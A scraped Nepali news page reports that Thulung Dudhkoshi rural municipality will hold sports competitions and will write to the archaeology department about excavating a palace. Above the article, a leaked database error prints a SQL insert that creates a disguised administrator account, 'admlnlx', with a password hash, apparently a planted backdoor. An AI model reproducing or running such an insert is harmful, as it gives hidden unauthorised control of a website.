WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BGr6z6hiej4kX0EE4xHahHBM6kZbmh/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 03:42:23', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । पुस २५ गते देखि थुलुङ दुधकोशी गाउँपालिकामा अध्यक्ष कप तथा राष्ट्रपति रनिङ शिल्ड प्रतियोगिता सुरु हुनेभएको छ ।
गाउँपालिका अध्यक्ष असिम राईको अध्यक्षतामा बिहिबार सम्पन्न कार्यपालिका बैठकले पुस २५ गते देखि उक्त प्रतियोगिता सञ्चालन गर्ने निर्णय गरेको प्रवक्ता भोजराज कार्कीले जानकारी दिए ।
कार्किका अनुसार प्रतियोगिता पुस २९ गते सम्पन्न हुने छ । जसको लागि गाउँपालिका उपाध्यक्ष सबिता राईको संयोजकत्वमा एक समिति गठन गरिएको छ । समितिले विभागिय जिम्मेवारी बाडफाड गर कार्यक्रमको तयारी गर्ने बताइएको छ ।राष्ट्रपति रनिङ शिल्ड प्रतियोगितामा पालिका भित्रका १० वटा माध्यमिक विद्यालयको सहभागिता रहने छ भने अध्यक्ष कपमा संघीय संरचना अनुसारका वडाबाट महिला तथा पुरुष खेलाडीहरुको सहभागीता हुनेछ ।
यस्तै सोही बैठकले ओगानेम दरबार उत्खननका लागि पुरातत्व विभागमा पत्राचार गर्ने पनि निर्णय गरेको छ । यस्तै बैठकले अन्य विभिन्न निर्णय गरेको बताइएको छ । थुलुङ दुधकोशी गाउँपालिकामा हरेक महिना कार्यपालिका बैठक बस्ने गरेको छ ।